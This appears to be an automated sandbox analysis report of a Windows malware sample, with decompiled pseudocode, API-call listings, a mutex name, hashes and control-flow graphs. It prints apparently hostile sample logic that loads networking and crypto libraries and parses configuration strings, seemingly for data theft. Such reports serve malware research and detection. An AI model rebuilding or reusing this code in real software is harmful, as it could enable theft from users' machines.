                                                                                                                                                                        					_t276 = _t276 + 4;
                                                                                                                                                                        					if(_t276 != 0x40e4dc) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L4;
                                                                                                                                                                        			}











































































                                                                                                                                                                        0x0040777b
                                                                                                                                                                        0x00407783
                                                                                                                                                                        0x00407793
                                                                                                                                                                        0x00407796
                                                                                                                                                                        0x0040779b
                                                                                                                                                                        0x004077aa
                                                                                                                                                                        0x004077ae
                                                                                                                                                                        0x004077d4
                                                                                                                                                                        0x004077d9
                                                                                                                                                                        0x004077de
                                                                                                                                                                        0x004077df
                                                                                                                                                                        0x004077e0
                                                                                                                                                                        0x004077e9
                                                                                                                                                                        0x004077f8
                                                                                                                                                                        0x004077f8
                                                                                                                                                                        0x004077ee
                                                                                                                                                                        0x004077fe
                                                                                                                                                                        0x00407805
                                                                                                                                                                        0x00407807
                                                                                                                                                                        0x00407807
                                                                                                                                                                        0x00407812
                                                                                                                                                                        0x0040781e
                                                                                                                                                                        0x0040782a
                                                                                                                                                                        0x00407834
                                                                                                                                                                        0x00407837
                                                                                                                                                                        0x0040783a
                                                                                                                                                                        0x00407847
                                                                                                                                                                        0x0040784f
                                                                                                                                                                        0x00407855
                                                                                                                                                                        0x0040785a
                                                                                                                                                                        0x0040785d
                                                                                                                                                                        0x00407862
                                                                                                                                                                        0x00407865
                                                                                                                                                                        0x00407868
                                                                                                                                                                        0x0040786b
                                                                                                                                                                        0x00407876
                                                                                                                                                                        0x0040787f
                                                                                                                                                                        0x00407882
                                                                                                                                                                        0x00407891
                                                                                                                                                                        0x00407894
                                                                                                                                                                        0x00407898
                                                                                                                                                                        0x0040789d
                                                                                                                                                                        0x0040789f
                                                                                                                                                                        0x004078b0
                                                                                                                                                                        0x004078b9
                                                                                                                                                                        0x004078be
                                                                                                                                                                        0x004078cf
                                                                                                                                                                        0x004078d4
                                                                                                                                                                        0x004078f1
                                                                                                                                                                        0x004078fa
                                                                                                                                                                        0x004078fd
                                                                                                                                                                        0x00407904
                                                                                                                                                                        0x0040790b
                                                                                                                                                                        0x00407920
                                                                                                                                                                        0x00407922
                                                                                                                                                                        0x00407924
                                                                                                                                                                        0x00407927
                                                                                                                                                                        0x00407936
                                                                                                                                                                        0x00407938
                                                                                                                                                                        0x00407941
                                                                                                                                                                        0x0040794f
                                                                                                                                                                        0x0040794f
                                                                                                                                                                        0x0040795d
                                                                                                                                                                        0x00407968
                                                                                                                                                                        0x0040796b
                                                                                                                                                                        0x0040796e
                                                                                                                                                                        0x00407970
                                                                                                                                                                        0x00407974
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407976
                                                                                                                                                                        0x0040797e
                                                                                                                                                                        0x00407981
                                                                                                                                                                        0x00407981
                                                                                                                                                                        0x0040798a
                                                                                                                                                                        0x0040798b
                                                                                                                                                                        0x00407991
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407993
                                                                                                                                                                        0x004079a6
                                                                                                                                                                        0x004079a9
                                                                                                                                                                        0x004079b2
                                                                                                                                                                        0x004079c9
                                                                                                                                                                        0x004079cc
                                                                                                                                                                        0x004079d3
                                                                                                                                                                        0x00407c45
                                                                                                                                                                        0x00407c48
                                                                                                                                                                        0x00407c4f
                                                                                                                                                                        0x00407c57
                                                                                                                                                                        0x00407c57
                                                                                                                                                                        0x004079de
                                                                                                                                                                        0x004079ee
                                                                                                                                                                        0x004079f1
                                                                                                                                                                        0x004079f5
                                                                                                                                                                        0x004079ff
                                                                                                                                                                        0x00407a01
                                                                                                                                                                        0x00407a01
                                                                                                                                                                        0x004079fb
                                                                                                                                                                        0x00407a15
                                                                                                                                                                        0x00407a1e
                                                                                                                                                                        0x00407a21
                                                                                                                                                                        0x00407a2a
                                                                                                                                                                        0x00407a33
                                                                                                                                                                        0x00407a4a
                                                                                                                                                                        0x00407a4c
                                                                                                                                                                        0x00407a5f
                                                                                                                                                                        0x00407a6b
                                                                                                                                                                        0x00407a6d
                                                                                                                                                                        0x00407a75
                                                                                                                                                                        0x00407a7a
                                                                                                                                                                        0x00407a82
                                                                                                                                                                        0x00407a90
                                                                                                                                                                        0x00407a93
                                                                                                                                                                        0x00407a9f
                                                                                                                                                                        0x00407aa1
                                                                                                                                                                        0x00407aa9
                                                                                                                                                                        0x00407aae
                                                                                                                                                                        0x00407abe
                                                                                                                                                                        0x00407ac1
                                                                                                                                                                        0x00407ae4
                                                                                                                                                                        0x00407aea
                                                                                                                                                                        0x00407afa
                                                                                                                                                                        0x00407b01
                                                                                                                                                                        0x00407b0a
                                                                                                                                                                        0x00407b11
                                                                                                                                                                        0x00407b19
                                                                                                                                                                        0x00407b26
                                                                                                                                                                        0x00407b28
                                                                                                                                                                        0x00407b2d
                                                                                                                                                                        0x00407b33
                                                                                                                                                                        0x00407b39
                                                                                                                                                                        0x00407b42
                                                                                                                                                                        0x00407b44
                                                                                                                                                                        0x00407b46
                                                                                                                                                                        0x00407b4b
                                                                                                                                                                        0x00407b5a
                                                                                                                                                                        0x00407b63
                                                                                                                                                                        0x00407b66
                                                                                                                                                                        0x00407b75
                                                                                                                                                                        0x00407b8a
                                                                                                                                                                        0x00407b77
                                                                                                                                                                        0x00407b7a
                                                                                                                                                                        0x00407b81
                                                                                                                                                                        0x00407b87
                                                                                                                                                                        0x00407b8e
                                                                                                                                                                        0x00407b8e
                                                                                                                                                                        0x00407b98
                                                                                                                                                                        0x00407ba1
                                                                                                                                                                        0x00407baa
                                                                                                                                                                        0x00407bb3
                                                                                                                                                                        0x00407bbc
                                                                                                                                                                        0x00407bd6
                                                                                                                                                                        0x00407be5
                                                                                                                                                                        0x00407beb
                                                                                                                                                                        0x00407beb
                                                                                                                                                                        0x00407bf3
                                                                                                                                                                        0x00407bfb
                                                                                                                                                                        0x00407c00
                                                                                                                                                                        0x00407c05
                                                                                                                                                                        0x00407c08
                                                                                                                                                                        0x00407c08
                                                                                                                                                                        0x00407c0e
                                                                                                                                                                        0x00407c12
                                                                                                                                                                        0x00407c19
                                                                                                                                                                        0x00407c1f
                                                                                                                                                                        0x00407c24
                                                                                                                                                                        0x00407c27
                                                                                                                                                                        0x00407c27
                                                                                                                                                                        0x00407c2d
                                                                                                                                                                        0x00407c31
                                                                                                                                                                        0x00407c38
                                                                                                                                                                        0x00407c3f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407a35
                                                                                                                                                                        0x00407a37
                                                                                                                                                                        0x00407a37
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407a33
                                                                                                                                                                        0x00407991
                                                                                                                                                                        0x0040799e
                                                                                                                                                                        0x004079a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004079a0
                                                                                                                                                                        0x004077b0
                                                                                                                                                                        0x004077b5
                                                                                                                                                                        0x004077b5
                                                                                                                                                                        0x004077bc
                                                                                                                                                                        0x004077c2
                                                                                                                                                                        0x004077c7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004077c9
                                                                                                                                                                        0x004077d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004077d2
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
                                                                                                                                                                          • Part of subcall function 0040100B: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,?,00407780), ref: 00401042
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Ole32.dll,?,?,?,?,?,00407780), ref: 00401051
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNEL32(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Shell32.dll,?,?,?,?,?,00407780), ref: 004010A1
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
                                                                                                                                                                          • Part of subcall function 0040100B: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00407783
                                                                                                                                                                          • Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
                                                                                                                                                                          • Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,76426c3f362f5a47a469f0e9d8bc3eef,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1
                                                                                                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 004077EE
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004077F8
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004078FD
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407904
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040790B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407976
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407981
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004079A0
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004079A9
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004079B2
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00407A01
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00407A37
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$LibraryLoad$ExitProcess$AddressProc$AllocByteCharCreateInitializeMultiMutexWide
                                                                                                                                                                        • String ID: $ $ $ $76426c3f362f5a47a469f0e9d8bc3eef$8n$iqroq5112542785672901323$xZm$x[m$x_o
                                                                                                                                                                        • API String ID: 1492179042-4050229475
                                                                                                                                                                        • Opcode ID: a44a232601d100edc6d36baaf6ddad01d88e14460ec27d44710cd718beb1410e
                                                                                                                                                                        • Instruction ID: e92a4b87a1a530e7256a75f8bb231f7b298302859da8ec0d9ad369049daf7dae
                                                                                                                                                                        • Opcode Fuzzy Hash: a44a232601d100edc6d36baaf6ddad01d88e14460ec27d44710cd718beb1410e
                                                                                                                                                                        • Instruction Fuzzy Hash: 25D18571E00214ABDB04ABB6DE49E6E77B5AF48310B10483AF905B73D1DF78AD118B5E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 442 4055b6-4055d2 444 405b56-405b5a 442->444 445 4055d8-4055d9 442->445 446 4055da-40560a LocalAlloc 445->446 449 405610-405625 call 40a3e4 446->449 450 405b4d 446->450 455 405b4a 449->455 456 40562b-40565e LocalAlloc 449->456 452 405b4e LocalFree 450->452 454 405b54-405b55 452->454 454->444 455->450 459 405664-405679 call 40a3e4 456->459 460 405b45-405b48 456->460 464 405b42 459->464 465 40567f-4056b2 LocalAlloc 459->465 462 405ae5-405aeb LocalFree 460->462 462->450 464->460 468 405b34-405b40 LocalFree 465->468 469 4056b8-4056cd call 40a3e4 465->469 468->462 472 405b31 469->472 473 4056d3-405706 LocalAlloc 469->473 472->468 476 405b13-405b2f LocalFree * 3 473->476 477 40570c-405721 call 40a3e4 473->477 476->452 480 405b10 477->480 481 405727-40575a LocalAlloc 477->481 480->476 484 405af0-405b0e LocalFree * 3 481->484 485 405760-405775 call 40a3e4 481->485 484->462 488 40577b-4057ae LocalAlloc 485->488 489 405aed 485->489 492 4057b4-4057cc call 40a3e4 488->492 493 405abe-405ae2 LocalFree * 4 488->493 489->484 492->493 496 4057d2-405809 LocalAlloc 492->496 493->462 499 405a82-405ab9 LocalFree * 6 496->499 500 40580f-405824 call 40a3e4 496->500 499->452 500->499 503 40582a-405864 LocalAlloc 500->503 506 40586a-40587f call 40a3e4 503->506 507 405a3d-405a7d LocalFree * 7 503->507 510 405885-4058de LocalAlloc call 405feb 506->510 511 405a3a 506->511 507->452 515 4058e4-405970 call 40a05f call 40a503 call 408619 510->515 516 4059ce-405a28 LocalFree * 9 510->516 511->507 530 405972-40598b 515->530 531 4059ab-4059cb LocalFree * 4 515->531 518 405a2b-405a2f 516->518 518->446 519 405a35 518->519 519->454 530->531 533 40598d-4059a8 call 407edb 530->533 531->516 533->531
                                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                                        			E004055B6(intOrPtr __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				void* _t131;
                                                                                                                                                                        				void* _t138;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				void* _t156;
                                                                                                                                                                        				void* _t162;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				void* _t181;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				void* _t209;
                                                                                                                                                                        				void* _t210;
                                                                                                                                                                        				void* _t211;
                                                                                                                                                                        				void* _t212;
                                                                                                                                                                        				void* _t213;
                                                                                                                                                                        				void* _t214;
                                                                                                                                                                        				void* _t226;
                                                                                                                                                                        				void* _t228;
                                                                                                                                                                        				void* _t229;
                                                                                                                                                                        				void* _t230;
                                                                                                                                                                        				char _t274;
                                                                                                                                                                        				void* _t289;
                                                                                                                                                                        				void* _t291;
                                                                                                                                                                        				void* _t295;
                                                                                                                                                                        				void* _t296;
                                                                                                                                                                        				void* _t298;
                                                                                                                                                                        				void* _t300;
                                                                                                                                                                        				void* _t302;
                                                                                                                                                                        				void* _t304;
                                                                                                                                                                        				void* _t306;
                                                                                                                                                                        				void* _t308;
                                                                                                                                                                        				int _t309;
                                                                                                                                                                        				void* _t311;
                                                                                                                                                                        				void* _t314;
                                                                                                                                                                        				signed int _t317;
                                                                                                                                                                        				void* _t319;
                                                                                                                                                                        				signed int _t321;
                                                                                                                                                                        				void* _t323;
                                                                                                                                                                        				signed int _t325;
                                                                                                                                                                        				void* _t327;
                                                                                                                                                                        				signed int _t329;
                                                                                                                                                                        				void* _t331;
                                                                                                                                                                        				signed int _t333;
                                                                                                                                                                        				void* _t335;
                                                                                                                                                                        				signed int _t337;
                                                                                                                                                                        				void* _t339;
                                                                                                                                                                        				signed int _t341;
                                                                                                                                                                        				void* _t344;
                                                                                                                                                                        				void* _t345;
                                                                                                                                                                        				void* _t347;
                                                                                                                                                                        				void* _t348;
                                                                                                                                                                        
                                                                                                                                                                        				_v56 = __edx;
                                                                                                                                                                        				_t295 =  *((intOrPtr*)( *0x40e18c))(_t230,  *0x40e250);
                                                                                                                                                                        				if(_t295 == 0) {
                                                                                                                                                                        					L42:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t296 = _t295 + 0xa;
                                                                                                                                                                        					_t117 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t296) + _t115);
                                                                                                                                                                        					_t226 = _t117;
                                                                                                                                                                        					_v8 = _t226;
                                                                                                                                                                        					_t314 =  *((intOrPtr*)( *0x40e18c))(_t296,  *0x40e1f0);
                                                                                                                                                                        					if(_t314 == 0) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t317 = _t314 - _t296 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t296,  &_v8, 0, _t317) == 0) {
                                                                                                                                                                        						_t226 = _v8;
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t298 = _t296 + _t317 * 2 + 2;
                                                                                                                                                                        					_t124 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t298) + _t122);
                                                                                                                                                                        					_t226 = _t124;
                                                                                                                                                                        					_v12 = _t226;
                                                                                                                                                                        					_t319 =  *((intOrPtr*)( *0x40e18c))(_t298,  *0x40e20c);
                                                                                                                                                                        					if(_t319 == 0) {
                                                                                                                                                                        						L37:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						L29:
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t321 = _t319 - _t298 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t298,  &_v12, 0, _t321) == 0) {
                                                                                                                                                                        						_t226 = _v12;
                                                                                                                                                                        						goto L37;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t300 = _t298 + _t321 * 2 + 2;
                                                                                                                                                                        					_t131 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t300) + _t129);
                                                                                                                                                                        					_t226 = _t131;
                                                                                                                                                                        					_v16 = _t226;
                                                                                                                                                                        					_t323 =  *((intOrPtr*)( *0x40e18c))(_t300,  *0x40e20c);
                                                                                                                                                                        					if(_t323 == 0) {
                                                                                                                                                                        						L35:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						goto L29;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t325 = _t323 - _t300 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t300,  &_v16, 0, _t325) == 0) {
                                                                                                                                                                        						_t226 = _v16;
                                                                                                                                                                        						goto L35;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t302 = _t300 + _t325 * 2 + 2;
                                                                                                                                                                        					_t138 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t302) + _t136);
                                                                                                                                                                        					_t228 = _t138;
                                                                                                                                                                        					_v20 = _t228;
                                                                                                                                                                        					_t327 =  *((intOrPtr*)( *0x40e18c))(_t302,  *0x40e20c);
                                                                                                                                                                        					if(_t327 == 0) {
                                                                                                                                                                        						L33:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_t228);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						L40:
                                                                                                                                                                        						L41:
                                                                                                                                                                        						goto L42;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t329 = _t327 - _t302 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t302,  &_v20, 0, _t329) == 0) {
                                                                                                                                                                        						_t228 = _v20;
                                                                                                                                                                        						goto L33;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t304 = _t302 + _t329 * 2 + 2;
                                                                                                                                                                        					_t147 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t304) + _t145);
                                                                                                                                                                        					_t226 = _t147;
                                                                                                                                                                        					_v24 = _t226;
                                                                                                                                                                        					_t331 =  *((intOrPtr*)( *0x40e18c))(_t304,  *0x40e20c);
                                                                                                                                                                        					if(_t331 == 0) {
                                                                                                                                                                        						L31:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						goto L29;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t333 = _t331 - _t304 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t304,  &_v24, 0, _t333) == 0) {
                                                                                                                                                                        						_t226 = _v24;
                                                                                                                                                                        						goto L31;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t306 = _t304 + _t333 * 2 + 2;
                                                                                                                                                                        					_t156 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t306) + _t154);
                                                                                                                                                                        					_t226 = _t156;
                                                                                                                                                                        					_v32 = _t226;
                                                                                                                                                                        					_t335 =  *((intOrPtr*)( *0x40e18c))(_t306,  *0x40e20c);
                                                                                                                                                                        					if(_t335 == 0) {
                                                                                                                                                                        						L28:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						LocalFree(_v24);
                                                                                                                                                                        						goto L29;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t337 = _t335 - _t306 >> 1;
                                                                                                                                                                        					_t162 = E0040A3E4(_t306,  &_v32, 0, _t337);
                                                                                                                                                                        					_t226 = _v32;
                                                                                                                                                                        					if(_t162 == 0) {
                                                                                                                                                                        						goto L28;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t308 = _t306 + _t337 * 2 + 2;
                                                                                                                                                                        					_v44 =  *_t226 & 0x0000ffff;
                                                                                                                                                                        					_t167 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t308) + _t165);
                                                                                                                                                                        					_v28 = _t167;
                                                                                                                                                                        					_t339 =  *((intOrPtr*)( *0x40e18c))(_t308,  *0x40e20c);
                                                                                                                                                                        					if(_t339 == 0) {
                                                                                                                                                                        						L27:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v24);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						LocalFree(_t226);
                                                                                                                                                                        						LocalFree(_v28);
                                                                                                                                                                        						goto L40;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t341 = _t339 - _t308 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t308,  &_v28, 0, _t341) == 0) {
                                                                                                                                                                        						goto L27;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t229 = _t308 + (_t341 + 1) * 2;
                                                                                                                                                                        					_v48 =  *_v28 & 0x0000ffff;
                                                                                                                                                                        					_push( *((intOrPtr*)( *0x40e08c))(_t229) + _t179);
                                                                                                                                                                        					_t309 = 0x40;
                                                                                                                                                                        					_t181 = LocalAlloc(_t309, ??);
                                                                                                                                                                        					_push( *0x40e228);
                                                                                                                                                                        					_t344 = _t181;
                                                                                                                                                                        					_push(_t229);
                                                                                                                                                                        					_v36 = _t344;
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e18c))() == 0) {
                                                                                                                                                                        						L26:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v24);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						LocalFree(_v32);
                                                                                                                                                                        						LocalFree(_v28);
                                                                                                                                                                        						LocalFree(_t344);
                                                                                                                                                                        						goto L40;
                                                                                                                                                                        					}
                                                                                                                                                                        					if(E0040A3E4(_t229,  &_v36, 0, _t182 - _t229 >> 1) == 0) {
                                                                                                                                                                        						_t344 = _v36;
                                                                                                                                                                        						goto L26;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v40 = _v40 & 0x00000000;
                                                                                                                                                                        					_t194 = LocalAlloc(_t309, 0x28000); // executed
                                                                                                                                                                        					_t345 = _t194;
                                                                                                                                                                        					_v52 = _t345;
                                                                                                                                                                        					_t195 =  *((intOrPtr*)( *0x40e074))(_v24);
                                                                                                                                                                        					_push( &_v40);
                                                                                                                                                                        					_push(_t345);
                                                                                                                                                                        					_t289 = 0x31;
                                                                                                                                                                        					_push(0 | _v48 == _t289);
                                                                                                                                                                        					_push(0 | _v44 == _t289);
                                                                                                                                                                        					_push(_t195);
                                                                                                                                                                        					_push(_v20);
                                                                                                                                                                        					_push(_v16);
                                                                                                                                                                        					_push(_v12);
                                                                                                                                                                        					E00405FEB(_v36, _v8); // executed
                                                                                                                                                                        					_t348 = _t348 + 0x20;
                                                                                                                                                                        					if(_v40 > 0) {
                                                                                                                                                                        						_t209 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
                                                                                                                                                                        						_t210 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
                                                                                                                                                                        						_t291 = 0x10;
                                                                                                                                                                        						_t211 = E0040A05F(_t209, _t291);
                                                                                                                                                                        						_v48 = _t211;
                                                                                                                                                                        						_t212 =  *((intOrPtr*)( *0x40e13c))(_t210,  *0x40e210);
                                                                                                                                                                        						_t311 = _v48;
                                                                                                                                                                        						_t213 = E0040A503(_t212, _t311);
                                                                                                                                                                        						_t274 =  *0x40e204; // 0x6d5b78
                                                                                                                                                                        						_v60 = _v60 & 0x00000000;
                                                                                                                                                                        						_v64 = _t274;
                                                                                                                                                                        						_v48 = _t213;
                                                                                                                                                                        						_t214 = E00408619( &_v48);
                                                                                                                                                                        						_v44 = _t214;
                                                                                                                                                                        						_t347 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        						 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        						if(0 != 0) {
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, _t347, 0, 0, 0);
                                                                                                                                                                        							if(0 != 0) {
                                                                                                                                                                        								E00407EDB(_v56, _t347, 0, 0, _v40, _v52, _v44,  &_v64);
                                                                                                                                                                        								_t348 = _t348 + 0x18;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_t347);
                                                                                                                                                                        						LocalFree(_v44);
                                                                                                                                                                        						LocalFree(_v48);
                                                                                                                                                                        						LocalFree(_t311);
                                                                                                                                                                        						_t345 = _v52;
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_t345); // executed
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        					LocalFree(_v12);
                                                                                                                                                                        					LocalFree(_v16);
                                                                                                                                                                        					LocalFree(_v20);
                                                                                                                                                                        					LocalFree(_v24);
                                                                                                                                                                        					LocalFree(_v32);
                                                                                                                                                                        					LocalFree(_v28);
                                                                                                                                                                        					LocalFree(_v36);
                                                                                                                                                                        					_t295 =  *((intOrPtr*)( *0x40e18c))(_t229,  *0x40e250);
                                                                                                                                                                        					if(_t295 != 0) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L41;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				LocalFree(_t226);
                                                                                                                                                                        				goto L40;
                                                                                                                                                                        			}







































































                                                                                                                                                                        0x004055c8
                                                                                                                                                                        0x004055ce
                                                                                                                                                                        0x004055d2
                                                                                                                                                                        0x00405b56
                                                                                                                                                                        0x00405b5a
                                                                                                                                                                        0x00405b5a
                                                                                                                                                                        0x004055da
                                                                                                                                                                        0x004055df
                                                                                                                                                                        0x004055f0
                                                                                                                                                                        0x004055fe
                                                                                                                                                                        0x00405601
                                                                                                                                                                        0x00405606
                                                                                                                                                                        0x0040560a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405615
                                                                                                                                                                        0x00405625
                                                                                                                                                                        0x00405b4a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b4a
                                                                                                                                                                        0x00405639
                                                                                                                                                                        0x00405644
                                                                                                                                                                        0x00405652
                                                                                                                                                                        0x00405655
                                                                                                                                                                        0x0040565a
                                                                                                                                                                        0x0040565e
                                                                                                                                                                        0x00405b45
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00405669
                                                                                                                                                                        0x00405679
                                                                                                                                                                        0x00405b42
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b42
                                                                                                                                                                        0x0040568d
                                                                                                                                                                        0x00405698
                                                                                                                                                                        0x004056a6
                                                                                                                                                                        0x004056a9
                                                                                                                                                                        0x004056ae
                                                                                                                                                                        0x004056b2
                                                                                                                                                                        0x00405b34
                                                                                                                                                                        0x00405b37
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x004056bd
                                                                                                                                                                        0x004056cd
                                                                                                                                                                        0x00405b31
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b31
                                                                                                                                                                        0x004056e1
                                                                                                                                                                        0x004056ec
                                                                                                                                                                        0x004056fa
                                                                                                                                                                        0x004056fd
                                                                                                                                                                        0x00405702
